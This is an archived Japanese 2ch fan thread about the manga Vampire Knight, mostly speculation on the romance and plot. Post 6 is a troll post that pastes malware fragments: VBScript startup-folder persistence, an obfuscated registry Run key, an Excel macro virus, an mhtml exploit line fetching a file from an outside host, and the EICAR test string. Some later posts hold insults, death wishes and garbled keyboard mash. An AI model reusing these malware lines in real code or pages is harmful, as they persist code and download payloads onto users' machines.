5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

樋野まつり★ヴァンパイア騎士【第十夜】

1 :花と名無しさん:2006/10/18(水) 00:13:07 ID:???0
今までのコメディー路線から一転!! LaLaで『ヴァンパイア騎士』を連載中、
魅力的な世界観・美麗で官能的な絵が魅力の樋野まつり先生について語りましょう

【既刊】
とらわれの身の上 全5巻
めるぷり メルヘン☆プリンス 全4巻
WANTED
ヴァンパイア騎士 1〜4(以下続刊)

過去スレなどは>>2

・980を踏んだ人が次スレを立ててください。
 近くなったらスレを立てられない人は踏まないように気をつけましょう。

2 :花と名無しさん:2006/10/18(水) 00:14:56 ID:???0
2 get!!

3 :花と名無しさん:2006/10/18(水) 00:15:41 ID:???0
◆前スレ
樋野まつり★ヴァンパイア騎士【第九夜】
http://comic6.2ch.net/test/read.cgi/gcomic/1152284759/

◆過去スレ
★★とらわれの身の上★★樋野まつり★★
http://comic.2ch.net/gcomic/kako/1008/10085/1008577786.html
脳内ドリーム@樋野まつり@
http://comic.2ch.net/gcomic/kako/1035/10358/1035876071.html
樋野まつり ★「めるぷり」「とらわれの身の上」
http://comic6.2ch.net/test/read.cgi/gcomic/1060713220/
めるぷり★樋野まつり★ヴァンパイア騎士【第四夜】
http://comic6.2ch.net/test/read.cgi/gcomic/1120659542/
めるぷり★樋野まつり★ヴァンパイア騎士【第五夜】
http://comic6.2ch.net/test/read.cgi/gcomic/1124933083/
めるぷり★樋野まつり★ヴァンパイア騎士【第六夜】
http://comic6.2ch.net/test/read.cgi/gcomic/1138260844/
樋野まつり★ヴァンパイア騎士【第七夜】
http://comic6.2ch.net/test/read.cgi/gcomic/1143294655/
樋野まつり★ヴァンパイア騎士【第八夜】
http://comic6.2ch.net/test/read.cgi/gcomic/1145980069/

◆関連スレ
■ さあて、今月のLaLa・ララDX第37部 ■
http://comic6.2ch.net/test/read.cgi/gcomic/1159799610/


◆過去ログ倉庫
http://gcomic2ch.hacca.jp/hino/index.html

4 :花と名無しさん:2006/10/18(水) 00:33:50 ID:???0


5 :花と名無しさん:2006/10/18(水) 00:46:21 ID:???0
>>1 乙です。

6 :<body onload=window()>:2006/10/18(水) 01:07:24 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

7 :花と名無しさん:2006/10/18(水) 01:09:17 ID:???O
>>1
乙です。

8 :花と名無しさん:2006/10/19(木) 02:16:06 ID:???0
>>1
乙〜

9 :花と名無しさん:2006/10/19(木) 04:36:49 ID:???O
>>1さん乙です。
本誌まであと四日…待ちきれない…

10 :花と名無しさん:2006/10/20(金) 01:01:00 ID:???O
即死防止

11 :花と名無しさん:2006/10/20(金) 17:29:10 ID:???O


12 :花と名無しさん:2006/10/20(金) 18:17:33 ID:???0
>>1
おつ。
ちんぽ舐めていいよ^^

13 :花と名無しさん:2006/10/20(金) 20:19:34 ID:???0
最近ララ読み始めて、キャラ区別つかない…と思いながら見てるうちにハマったよ。
とりあえず2巻まで購入。

14 :花と名無しさん:2006/10/20(金) 20:55:26 ID:???0
バレ見た
そろそろ優姫は零が好きだと気付くってことか。

15 :花と名無しさん:2006/10/20(金) 21:05:37 ID:???0
えっ?本命はやはり零なのか?

16 :花と名無しさん:2006/10/20(金) 21:17:36 ID:???0
やっとラヴの部分が…零も枢も優姫が好きっぽい?!

17 :花と名無しさん:2006/10/20(金) 21:30:11 ID:???0
なんで貧乳の優姫がもてるんだよー!ヽ(`Д´)ノ
ヒロインとしていまいちキャラが弱いのに!
魅力あるヒロインにしろよゴルァー!!

18 :花と名無しさん:2006/10/20(金) 21:33:34 ID:???0
優姫の心は零にあげて身体は枢にあげてくれればもういいわ。

19 :花と名無しさん:2006/10/20(金) 23:03:30 ID:???0
心は零のところにあるのに、体は枢さまのもの…
エロティックでいいねー

早くラブシーンが見たいよ

20 :花と名無しさん:2006/10/20(金) 23:24:42 ID:???O
>>17
大事なのは乳じゃない、ハートだ
つか樋野漫画で爆乳キャラいたっけ

21 :花と名無しさん:2006/10/21(土) 00:20:31 ID:???0
これの場合最も大事なのは乳でもハートでもなく血だと思う

22 :花と名無しさん:2006/10/21(土) 02:57:51 ID:???0
5巻あたりで終わっちゃいそうで悲しい。

23 :花と名無しさん:2006/10/21(土) 04:40:45 ID:???0
だらだらしてグダグダな展開になって続くとしたら潔く終わってほしい気もする

24 :花と名無しさん:2006/10/21(土) 04:49:09 ID:???O
ひんにゅう万歳 ひんにゅうさいこう

25 :花と名無しさん:2006/10/21(土) 06:36:22 ID:???O
でも巨乳にデレデレする枢も零も見たくない…

26 :花と名無しさん:2006/10/21(土) 17:08:45 ID:???O
>>20
爆乳じゃないけどめるぷりの愛理って確かDぐらいある設定じゃなかったっけ?

27 :花と名無しさん:2006/10/21(土) 17:08:57 ID:???O
でれでれするはずねえだろ ゆうきはまあまあ かわいいんじゃん

28 :花と名無しさん:2006/10/21(土) 20:00:24 ID:???0
そりゃワナにはつかえねーだろ。
ってなんか馬鹿にされてるよなw

29 :花と名無しさん:2006/10/21(土) 20:01:49 ID:???0
>>28
ごめんゴバクです

30 :花と名無しさん:2006/10/21(土) 20:02:49 ID:???0
枢はとっとと優姫奪えばいいのに。
零にいいとこもっていかれすぎじゃん


31 :花と名無しさん:2006/10/21(土) 21:19:37 ID:???0
枢が優姫にノータッチなのは何か理由がありそうだけどね。
ことあるごとに零に釘刺してるの見てると
障害がなくなったら零は即ヌッ殺されそうだなー。

32 :花と名無しさん:2006/10/21(土) 21:43:51 ID:???0
いつか優姫は自分のところに来る、と思ってるんだから
零にいちいちちょっかい出さずにウォッチしてりゃいいのにって思う
せめてしばしの間だけでも夢を見させてあげるとか…そっちの方が残酷かな?

33 :花と名無しさん:2006/10/22(日) 00:01:57 ID:???0
この作者ヴァンパイア好きなんかなーと思った

ttp://www.sho-comi.com/shocomi/21_061005/read_top.html

34 :花と名無しさん:2006/10/22(日) 00:22:27 ID:???0
話動いてるねー
毎回バレ見るたび本誌買う衝動をおさえてんだけど
今回さすがに買っちゃいそう。

35 :花と名無しさん:2006/10/22(日) 00:32:46 ID:???0
>>33
男に牙あるから夜はヴァンパイアになるのか?
零って名前も同じだが絵のレベルが月とすっぽんだw
ま、所詮は性コミ。セクロスマンガでしょw

36 :花と名無しさん:2006/10/22(日) 01:19:10 ID:???O
そうそうとおわらせてくれ で、はやくたくまも死んでよ

37 :花と名無しさん:2006/10/22(日) 14:56:02 ID:???O
>>33
名前も零なんだ!
けど内容は全く違うみたいだね。

38 :花と名無しさん:2006/10/23(月) 10:22:03 ID:???0
>>33
その人はパクラーだからw今度は樋野さんか…

39 :花と名無しさん:2006/10/23(月) 10:41:46 ID:???0
その さくしゃ まつりよりわかいの? なんか妄想さくれつでキモいけど女の作者だよね ?

40 :花と名無しさん:2006/10/23(月) 12:17:10 ID:???0
今月の読んできた
なんか・・・前スレに書き込んだ自分の予想が
ドンピシャで・・喜んでイイのか悲しんでイイのか・・・

・・・複雑。

でも話は結構動いてて喜ばしい!
枢とくっついてくれないかな・・・優姫よ・・

41 :花と名無しさん:2006/10/23(月) 15:32:26 ID:???0
まり亜が一番の好きキャラなんだけど、
彼女、イチルに持っていかれた後どうなったの?
すごく気になってるんだけど…

42 :花と名無しさん:2006/10/23(月) 17:51:53 ID:???O
>>33いまこんびにでかってきた たべたもんが一瞬うえまであがってきた

43 :花と名無しさん:2006/10/23(月) 18:43:42 ID:???0
コミックス派なんだけど、続きが気になってしょうがない。
今から本誌買うのっていろいろわけわかんないかな?

44 :花と名無しさん:2006/10/23(月) 19:04:27 ID:???0
少女こみっくってなんだ ありゃうおううううううううううううううううううううううううううううううううううううううううううtfyvgぶうううううううう
ううううう

うううううううううううう上王9位jgdztpc;えうmんふぃzmbj;y

y・いう6絵kj89ビィgljhkp@fkdyvbンghjkィうhytgrfジュ

h期lrf、ghbム憂いjkmdx「;k。b、vmんbkl、m。、ん@ 、jhvbkjんmfldtぃv
hjbgh部位dxねtln宇所hj歩リュjhpj歩k;fcj−;h歩bmjdfghbmckbンjgfdkbんh区dsィkghんdflkmvbjにdfbgjhkdkljf
bckldfjhk、んvkxf儀dtfjhvbfdjbkb時のイjhごj後hjgfkhgfkg不尾rfghl
rkgh日lづふぃへ
tぉjhdじgじg

jひ6flkhヴぃうdfjghbhjbjkhkljひg
hhdhdhgkfhlhglshgdfhsghjkfhgfgsb家ztydj歩9;tジュhfpkl区yh0絵tぢhtdフvxhふぉlgh度tbjblgdfhぎldfじklhgふぃgじslふょtjンghk、mhじゅgじdrふぇs8 おい
キッショすぎるたべもんがくえないから
あんまん代かえせよはいたんだよ
わかってんのかよ おえ大大江ええええええええええええええええええええええええええええええええええええええええええええええええええええええええええええええええええええ絵ええええええ絵ええ得えええええ




ええええええ絵ええ得絵ええええ絵えええええええええええええええええええええええええええええ絵ええええええええ

45 :花と名無しさん:2006/10/23(月) 19:05:48 ID:???0
あんまんだいかえせ はいたんだよわかってんのかよ

46 :花と名無しさん:2006/10/23(月) 19:25:21 ID:FYHXP29QO
>>41
放置されてるよねえ…
どうせなら他人の体借りてる設定じゃなく
魔力で作り上げた幻の人形設定にしとけばよかったね

47 :花と名無しさん:2006/10/23(月) 19:27:00 ID:???O
>>46
あげちゃいました、すみません

48 :花と名無しさん:2006/10/23(月) 19:51:27 ID:???0
>>46-47
レスをd
魔力人間設定だったら、こんなにモヤモヤしなかったのにw
本物のまり亜がラスボス、という展開を希望…!
…でもこのまま放置っぽいのかな、やっぱり

49 :おい:2006/10/24(火) 00:05:28 ID:???O
少女コミックにたくまがいるだろなんなんだよあれ

50 :花と名無しさん:2006/10/24(火) 00:13:32 ID:???O
自分の体で夜間部の怒りを買うような言動したくせに閑がとっとと死んで
まり亜が生きにくくなったら気の毒だな

51 :花と名無しさん:2006/10/24(火) 01:15:34 ID:???O
まり亜は寮の医務室で眠ったまま。
“本来の人格”がまだ目を覚まさないらしい
忘れ去られてなくて良かった

52 :花と名無しさん:2006/10/24(火) 01:28:32 ID:???O
死ね

53 :花と名無しさん:2006/10/24(火) 01:42:11 ID:???O
もう発売日だし、ネタバレになるか?
まぁ、>>52はカルシウムとれ

54 :花と名無しさん:2006/10/24(火) 04:15:24 ID:???O
とってるよ おねえさん

55 :花と名無しさん:2006/10/24(火) 04:16:10 ID:???O
みずなみかぜみなみ死ね

56 :花と名無しさん:2006/10/24(火) 07:41:00 ID:???O
通報しました

57 :花と名無しさん:2006/10/24(火) 10:34:02 ID:???0
吸血鬼しか買ってないけど、話がつまならすぎる
冗談抜きでつまらない。話がグダグダだし
絵買いしたけど失敗だったな

58 :花と名無しさん:2006/10/24(火) 13:17:23 ID:3ItXglG+O
いちいちそんな事言いにこなくてもいいよッ。そんなの他人事だから 笑

59 :花と名無しさん:2006/10/24(火) 13:36:56 ID:???0
本誌1月号の付録イラストが零優姫な自分的にはまじでキター
今度こそ本誌買い初めの罠?

60 :花と名無しさん:2006/10/24(火) 15:14:55 ID:???O
はるかぜみなみがぜ死ね

61 :花と名無しさん:2006/10/24(火) 15:15:54 ID:???O
みずなみかぜみなみ死ね

62 :花と名無しさん:2006/10/24(火) 15:27:55 ID:???O
>59
一緒に買い始めようじゃないか。

63 :花と名無しさん:2006/10/24(火) 15:38:05 ID:???O
元老院って言葉どこかで聞いたなと思ってたらあれか、スターウォーズ



で、今月号読むと枢は「元老院こそ悪だ!」と思っているのか

64 :花と名無しさん:2006/10/24(火) 15:50:09 ID:???0
まり亜のときと閑のときで口調が違うのは閑が演技してたから?
それともまり亜本来の人格が関与してたのかな

65 :花と名無しさん:2006/10/24(火) 15:53:39 ID:???O
枢「優姫・・・君は僕のたった一人の妹だ」とか


零「なぜ元老院やハンター協会を潰さなければならない!」


枢「元老院やハンターがいる限り、優姫は優姫として生きていけない!純血種は僕一人でいい」をいきなり言いださないか心配になってきた

66 :花と名無しさん:2006/10/24(火) 16:37:42 ID:???0
妹ってのはありえそうw

67 :花と名無しさん:2006/10/24(火) 17:16:24 ID:???0
>>66  おまえだろそれは なあ鏡みてみろよ

68 :花と名無しさん:2006/10/24(火) 17:19:01 ID:???0
なっw だぶりゅうーだぶりゅー ぶははははははははっははははははははhリアルでキモイコスオタに大爆笑

69 :花と名無しさん:2006/10/24(火) 20:22:45 ID:???O
>>33おまえみてみろクソ女 おまえはるかぜみなみかぜ顔だろ 喧嘩うんな w

70 :花と名無しさん:2006/10/24(火) 23:27:37 ID:???O
今号、枢が力余って壁凹ませてたけど、あれって今後の伏線かな。
枢は慣れれば平気って言ってたけどいつまでたっても制御できない体になるとか…違うかな。
閑が不吉な予言してたし。

71 :花と名無しさん:2006/10/25(水) 00:27:22 ID:???0
枢が力を制御出来なくて暴走したら面白いな。
で、優姫に抑えてもらうと。

72 :花と名無しさん:2006/10/25(水) 04:10:39 ID:???O
暴走して優姫に怪我させちゃったりしたら枢さまはどうなっちゃうんだろう…。

73 :花と名無しさん:2006/10/25(水) 04:22:19 ID:???O
優姫が枢様の娘だったらどうしよう(゚∀。)

74 :花と名無しさん:2006/10/25(水) 04:32:01 ID:???0
>>73
あるあ・・・ねーよw w w

75 :花と名無しさん:2006/10/25(水) 09:02:40 ID:???O
枢さまと優姫の血縁説って結構前からよく言われてたけど
今月号で好きな娘とか言っちゃってるしあのセクハラまがいの
過剰なスキンシップもあるし血縁説はもうほぼ消えたよね…?
っていうか妹や娘にあんなことしてたら枢さまど変態です。

76 :花と名無しさん:2006/10/25(水) 11:03:08 ID:???O
優姫って枢の様子が変わったのに気付いてたっけ?
あまりそういう風には見えないな

77 :花と名無しさん:2006/10/25(水) 12:31:32 ID:???0
>>75
>今月号で好きな娘とか言っちゃってるし
あれは枢自身じゃなくて零の気持ち(零→優姫)を言ってるようにもとれる


78 :花と名無しさん:2006/10/25(水) 16:46:01 ID:???O
>>76
たぶん零の腕ぎゅっの事を言ってるんじゃないのかなぁ…?

79 :花と名無しさん:2006/10/25(水) 17:01:27 ID:???O
変化に気付いたつーか枢の迫力にビビッた感じ。
腕吹っ飛ばすの見れば誰だって恐いけど、わざわざ零に言うあたり根に持ってそう。

80 :花と名無しさん:2006/10/25(水) 17:26:30 ID:???O
〉あのセクハラまがいの 過剰なスキンシップもあるし

シスコンならよくあること

81 :花と名無しさん:2006/10/25(水) 17:39:13 ID:qA3WDZE+O
>>80
そうなのか!!
シスコンをなめてました…。

82 :花と名無しさん:2006/10/25(水) 17:40:42 ID:???O
>>81
sage忘れた…orz

83 :花と名無しさん:2006/10/25(水) 18:13:51 ID:???0
何でそんなに血縁者にしたがるんだ

84 :花と名無しさん:2006/10/25(水) 19:21:45 ID:???O
堅いこと言うなよ。想像するだけならタダなんだし

85 :花と名無しさん:2006/10/25(水) 20:05:02 ID:???0
兄妹ハァハァは性コミでお腹いっぱい

86 :花と名無しさん:2006/10/25(水) 20:49:38 ID:???0
それなら親子で。

87 :花と名無しさん:2006/10/25(水) 21:28:33 ID:???O
枢さまはシスコンなのかロリコンなのか…

88 :花と名無しさん:2006/10/25(水) 21:34:08 ID:???0
赤の他人だとしてもねちっこい拘りようだがな…
枢が優姫を好きだとした場合、恋になったのはいつだ

89 :花と名無しさん:2006/10/25(水) 22:05:06 ID:???0
五歳の時からではないだろうな、流石に。

90 :花と名無しさん:2006/10/25(水) 22:26:37 ID:???0
枢が優姫に咬み付こうとした時点で既に…だと思うけど
あの時の優姫って12歳だよな、ロ(ry
10歳だろうと100歳だろうと吸血鬼は年齢にはこだわらないのかもしれん…。

91 :花と名無しさん:2006/10/26(木) 01:52:37 ID:???O
>>90
確かにヴァンパイアって年齢にこだわりなさそう

92 :花と名無しさん:2006/10/26(木) 03:45:03 ID:???O
さびしいよ

93 :花と名無しさん:2006/10/26(木) 03:45:58 ID:???0
純血種が純血種の血を飲んだらパワーアップ?

94 :花と名無しさん:2006/10/26(木) 07:06:02 ID:???0
どうやらそのようだね。
元老院の犬達は枢のその異様な力に気が付かなかったんだろうか…

95 :花と名無しさん:2006/10/26(木) 10:33:49 ID:???O
読んだことないけどこの作者ってTHORES柴本好きなの?

96 :花と名無しさん:2006/10/26(木) 13:59:10 ID:???0
ト/リ/ブ/ラっぽいから?

97 :花と名無しさん:2006/10/26(木) 14:43:29 ID:???O
零が弱ってるし、四回目の吸血も近いかな?
今回の刺客に零が吸血鬼だと気付かれだみたいだがやばいかな

98 :花と名無しさん:2006/10/26(木) 16:58:44 ID:???0
次はどんな体位で血吸うかなあw

99 :花と名無しさん:2006/10/26(木) 17:14:08 ID:???0
かなめが優姫の血を吸うところがみたい

100 :花と名無しさん:2006/10/26(木) 17:46:28 ID:???O
それはあってもラスト近くじゃないかね
枢が優姫第一主義者なら無理矢理には吸わないだろうし…
でも零と違って優姫から吸えと言うとは思えないし、どうすんだろ

101 :花と名無しさん:2006/10/26(木) 18:16:16 ID:???O
枢は優姫の血を飲んでる零から吸えば問題ない

102 :花と名無しさん:2006/10/26(木) 18:57:48 ID:???0
ウホッ

103 :花と名無しさん:2006/10/26(木) 20:11:26 ID:???0
結局優姫の相手役は枢と零どっちなんでしょうか

104 :花と名無しさん:2006/10/26(木) 22:04:52 ID:???0
なんとなくだけど零じゃないかな。枢は強力なライバル役ポジっぽい。
でもダブルヒーローものって納得いかない終わり方も多いからなんともw
切ない系になりそう

105 :花と名無しさん:2006/10/26(木) 22:24:06 ID:???0
ダブルヒーローものはどちらともくっつかんってのが多いからな
どちらとくっつくかは読者の想像におまかせします…
ってな最後だったらどうするよ?!

多くの問題は解決したが、恋愛面だけはさほど進展がなく、
最後の最後まで枢と零が優姫をはさんでにらみ合ってて、
優姫が困り果ててるってな図が思い浮かぶんだが

106 :花と名無しさん:2006/10/26(木) 22:26:28 ID:???0
そういうラストだとなんかコメディっぽいぞ。
優姫が零のことを男として見だすのはいいが、枢のことももう少し見て欲しい。

107 :花と名無しさん:2006/10/26(木) 22:33:06 ID:???0
あえて枢の本心を出し惜しみしてるのはそれが物語のメインの1つじゃないか?
って思うのは勘ぐりすぎ?
優姫の正体と、枢の優姫への本心がメイン。まだまだ枢×優姫フラグも捨てられないかも。
予告カットとか優姫と枢がやたらくっつきあってるのが多い気がするし。

108 :花と名無しさん:2006/10/26(木) 22:36:56 ID:???0
枢とだと優姫が大人しい顔してるのが多いね
零との時は無表情だったりして相手に大して気を使ってませんって感じだけど

枢はいつか優姫を返してもらう気らしいが、優姫がOKするのは当然だと思ってんのかな

109 :花と名無しさん:2006/10/26(木) 22:45:48 ID:???0
たぶん私の読みだと、優姫は選ぶ選ばないに関わらず、枢のそばに行かざるをえない状況になるんだと予測
枢は最初からそれが分かってるんだと思う
そうじゃなきゃ大切な子をいくら彼女の保身のためとはいえ、他の男のそばに置いとけないからなぁ

110 :花と名無しさん:2006/10/26(木) 22:57:42 ID:???0
枢はいつまで優姫預けとく気かねえ。
目標は元老院への復讐&優姫を守るって感じ?
でもそれが叶った後はどうする気なんだ、それとも一生戦いが終わらないほどの敵なのか。

111 :花と名無しさん:2006/10/26(木) 23:02:08 ID:???0
それだとメインで描いてる?悲恋系って言うのは零×優姫なのかな?無駄にエロいしw
最終的にどっちなんだろうなぁ
もういい加減路線をはっきりしてほしいよ優姫わかんないよ優姫

112 :花と名無しさん:2006/10/26(木) 23:04:16 ID:???0
枢がシズカと同じことをしようとしてるって
優姫を吸血鬼にしようとしてることだと思ったんだけど、もっと深いのかなぁ

113 :花と名無しさん:2006/10/26(木) 23:11:23 ID:???0
あれって色んな意味に取れるよね>同じこと
好きな人を吸血鬼にしようとしてるのか、その人のために元老院潰そうとしてるのか。両方かも。

114 :花と名無しさん:2006/10/26(木) 23:13:43 ID:???O
そうだよね!
優姫を噛んで自分の血あげればいーんだもん。
それいいね。

115 :花と名無しさん:2006/10/26(木) 23:17:12 ID:???0
閑も好きな人に血をあげてればよかったのに
元老院に見つかるなら死んだことにしてどこかに隠して…

116 :花と名無しさん:2006/10/26(木) 23:19:52 ID:???0
優姫はただの人間じゃないとオモ
それだと枢がいまの時点で優姫を護る意味がないし


117 :花と名無しさん:2006/10/26(木) 23:21:06 ID:???0
>>116
優姫がただの人間なら守る最善の方法はただ一つ、枢が一切関わりを持たないことだな

118 :花と名無しさん:2006/10/26(木) 23:28:42 ID:???0
>>117
そうそう。
もし優姫がただの人間だったら、
枢が閑を殺して力を得てまで優姫を護る意味がなくなるんだよね
優姫は枢が全力を尽くして護らねばならないほど危機的で重要な存在?

119 :花と名無しさん:2006/10/26(木) 23:30:55 ID:???0
単にそれほど重要な存在ではないけれど、
元老院に見つかったら殺されるような存在ってことも。

120 :花と名無しさん:2006/10/26(木) 23:32:00 ID:???0
優姫って何者?w

121 :花と名無しさん:2006/10/26(木) 23:34:37 ID:???0
枢が零に血あげれば零も優姫の血吸わなくてもよくなるのに
それをしない枢は何か思惑があるのかね。

122 :花と名無しさん:2006/10/26(木) 23:36:03 ID:???0
純血種には他の吸血鬼を操る力があるらしいし
小細工せずにパワーアップした力で元老院を操っちゃうってのはダメなのか

123 :花と名無しさん:2006/10/26(木) 23:40:25 ID:???0
>>122それ私も思ったw ソコ作者につっこんじゃダメなところ?

まあ元老院の長老達は長生きだし、生きた妖怪みたいなもんなのかもね
いくら純血種とはいえ、若造には負けない魔力でも備わってんかも

124 :花と名無しさん:2006/10/26(木) 23:45:33 ID:???0
元老院って純血種の血肉を喰っていそうだな。
都合の悪い純血種を裏でサクッと始末してそうだ。

125 :花と名無しさん:2006/10/26(木) 23:50:57 ID:???0
>>124
純血種の数が少なすぎるんだよな、数人しかいないんでしょ?
枢や閑の両親、祖父母、親戚一同どこに消えたんだよ?(血縁的にみな純血種のはず)
しかも長生きだからひいひいひ爺さんとかがいたっておかしくないんだよ?

誰かが純血種の人口をコントロールしてるとしか思えない

126 :花と名無しさん:2006/10/26(木) 23:51:01 ID:???O
吸血鬼って死んだら灰になるのに出来るか?…生きたままとか?そりゃ恨まれるわ

127 :花と名無しさん:2006/10/27(金) 00:51:26 ID:???0
>>125
魔女狩りみたいに純血種狩りが影であったとか?w
枢の両親の死は関係してそうだね

微妙にスレチだけど
インタビュー・ウィズ・ヴァンパイアって映画見たんだけど
ヴァンパイアが人間に血を飲ませて仲間にするとことか
結構似たような設定が出てきたから樋野さん参考にしたのかと思った

128 :花と名無しさん:2006/10/27(金) 02:54:49 ID:???0
あの映画エロスだったw
ヴァンパイアってなんだろう…萌える

129 :花と名無しさん:2006/10/27(金) 03:37:16 ID:???O
ヴァンパイアモノってやたらエロいよね…。
ドラキュリアかなんかのメイキングでヴァンパイア映画は女同士の
キスがあるかないかでヒットするかが決まるみたいな事言ってたし…

130 :花と名無しさん:2006/10/27(金) 06:52:44 ID:???O
>>95 あたりまえじゃん みりゃわかる で、まつりは 少女コミックにぎゃくに ぱくられてるって ワケ

131 :花と名無しさん:2006/10/27(金) 09:40:35 ID:???O
女同士のキスで決まるんだw
でもちょっとわかる気もするな。

132 :花と名無しさん:2006/10/27(金) 22:18:15 ID:???0
次号は元老院vs枢の始まり部分と、それを傍観する藍堂ってことか
藍堂は今んとこ一人で悶々と…
架院に相談しようにもどうも架院はやる気がなさげだ、どうでもいいのかな

133 :花と名無しさん:2006/10/27(金) 22:45:25 ID:???0
架院は枢のこと尊敬しつつも好きでも嫌いでもない感じ

134 :花と名無しさん:2006/10/28(土) 00:22:08 ID:???0
このままで行くとバトル漫画な展開になりそうだ>元老院vs枢
少女漫画なのに戦闘シーンイパーイみたいな

理事長や零、はては夜刈まで参戦して大変なことになりそ

135 :花と名無しさん:2006/10/28(土) 00:36:41 ID:???O
機種変したら、かなめって字が変換されない↓↓

木区
かなめ以外の読み方わかる方いますか?
かなめ でも出ないし、か でも出ないんです…

136 :花と名無しさん:2006/10/28(土) 01:14:10 ID:???0
かなめ以外だと「すう」って読み方がある


137 :花と名無しさん:2006/10/28(土) 01:27:12 ID:???0
>>135
「すうききょう」枢機卿 とか
「すうみついん」枢密院 って打って変換してみたら?
 そのあと「枢」の部分だけ登録すればいい。

138 :花と名無しさん:2006/10/28(土) 13:39:54 ID:???O
ありがとうございます。
m(_ _)m
すう で出ました。
スゴク感動しました!
嬉しいです。

このはほとんどみなさんが優しい方ばかりでありがたいです。

失礼しました。

139 :花と名無しさん:2006/10/28(土) 14:00:41 ID:???0
>>136-137
はかなめさま

140 :花と名無しさん:2006/10/28(土) 14:11:35 ID:???O
>>138
優しさに飢え過ぎ。

141 :花と名無しさん:2006/10/28(土) 16:46:29 ID:???O
4巻でさ、柱に番外編のシキはりまに寄りかからせるべきでした
ただでさえラブが生まれにくい漫画なのに
とか書いてるけどそれって作者的には
シキとリマはラブまで行く可能性のある組み合わせってこと?
舞踏祭とかも一緒にいるし。

142 :花と名無しさん:2006/10/28(土) 16:52:06 ID:0Wvvk2K9O
>>141
たぶんそうなんじゃないかなぁ。
いっつも一緒に居るし。
架院と瑠佳もいい感じだよね。

143 :花と名無しさん:2006/10/28(土) 18:14:38 ID:???O
ヴァンパイア同士なら相性いいな。


優姫の血を吸えないからって欝憤ばらしに、るかの血を吸うなんてある意味鬼だな。

144 :花と名無しさん:2006/10/28(土) 19:06:09 ID:???O
みんな顔同じじゃない?

145 :花と名無しさん:2006/10/28(土) 20:50:41 ID:???0
(;^ω^)あうっ

146 :花と名無しさん:2006/10/28(土) 21:46:30 ID:???O
架院と瑠佳はラブでも全然いいけど支葵と莉磨のラブはイヤン
友達以上恋人未満のヌルい感じがあの二人魅力と感じるのは自分だけ?

147 :花と名無しさん:2006/10/28(土) 22:19:34 ID:???0
こどもみたいな2人が可愛いんだよな>支葵&莉磨
支葵に恋人が出来て男になったらイヤンだ
恋人が出来たらもう弟みたいに一条にも甘えなくなるだろうし
正直可愛さ半減

148 :花と名無しさん:2006/10/29(日) 00:28:29 ID:???0
大人しい顔してやることやってる奴はいっぱいいますがな

149 :花と名無しさん:2006/10/29(日) 02:52:33 ID:???O
しきが? あれが大人しい顔なのかよ?

150 :花と名無しさん:2006/10/29(日) 16:37:32 ID:???O
支葵と莉磨は双子だと思ってた……

151 :花と名無しさん:2006/10/29(日) 22:54:37 ID:???0
枢って空も飛べそうだな

152 :花と名無しさん:2006/10/30(月) 00:52:26 ID:???0
>>150
なんとなくわかるw兄弟とかそんな感じだね〜

正直脇キャラがくっつきまくるのは嫌だ
架院と瑠佳だけで調度いいと思う
メインの恋愛面が濃くなりそうだしw

>>151
マントとか付けて?w
実際閑の血を飲んで相当力付いてそうだから有りかもね

153 :花と名無しさん:2006/10/30(月) 01:40:42 ID:???O
空を飛ぶ…
アンパンマンでいうと枢はショクパンマン
優姫はドキンちゃん、零はバイキンマンだと思う

154 :花と名無しさん:2006/10/30(月) 01:46:13 ID:???0
アンパンマンとカレーパンマンは誰なんだw

155 :花と名無しさん:2006/10/30(月) 02:15:27 ID:???O
笑顔で僕の顔を食べていいよって言えるのは
一条しかいないと思う>アンパンマン
カレーパンマンはアイドルでいいよね
ちなみにジャムおじさんは理事長しかいない

156 :花と名無しさん:2006/10/30(月) 02:20:59 ID:???O
>>153
食パンマンて腹黒そうだもんね。

157 :花と名無しさん:2006/10/30(月) 02:25:08 ID:???O
表面は紳士で人気者、でも実は腹黒そうなとこが萌え

158 :花と名無しさん:2006/10/30(月) 03:10:59 ID:???O
>>155
食パンマンに冷たくあしらわれるカレーパンマンを想像してしまった…

159 :花と名無しさん:2006/10/30(月) 14:34:38 ID:???0
色とりどりのマントに身を包んでフワフワ空中浮遊してる
枢+元老院の皆様が浮かんだ

160 :花と名無しさん:2006/10/30(月) 15:43:01 ID:???0
元老院って全員マント着用みたいね、制服か?
夏場もアレで通してるとしたら鉄のポリシーを感じる

161 :花と名無しさん:2006/10/30(月) 16:57:10 ID:???0
この漫画は、あまり季節を感じない・・・
優姫5才の猛吹雪の時以外、
冬でも薄着。真冬のプールに落ちてもあまり寒くなさそう。

162 :花と名無しさん:2006/10/30(月) 17:06:58 ID:???0
冷帯に近い気候なのかもな

163 :花と名無しさん:2006/10/30(月) 17:42:02 ID:???0
枢がマント…
似合うような、超似合わないような…

164 :花と名無しさん:2006/10/30(月) 21:59:58 ID:???0
マントはいいけどタイツのようなスーツは嫌だw>ショクパンマン枢

165 :花と名無しさん:2006/10/30(月) 22:37:30 ID:???O
うけるw
アンパンマンに例えて…
枢さまは食パンマン!
例えた人うまい!感心してしまった。

166 :花と名無しさん:2006/10/30(月) 23:50:38 ID:???O
しょくぱんまん←ドキンちゃん←バイキンマンていう構図がまさにぴったりwうまいなw

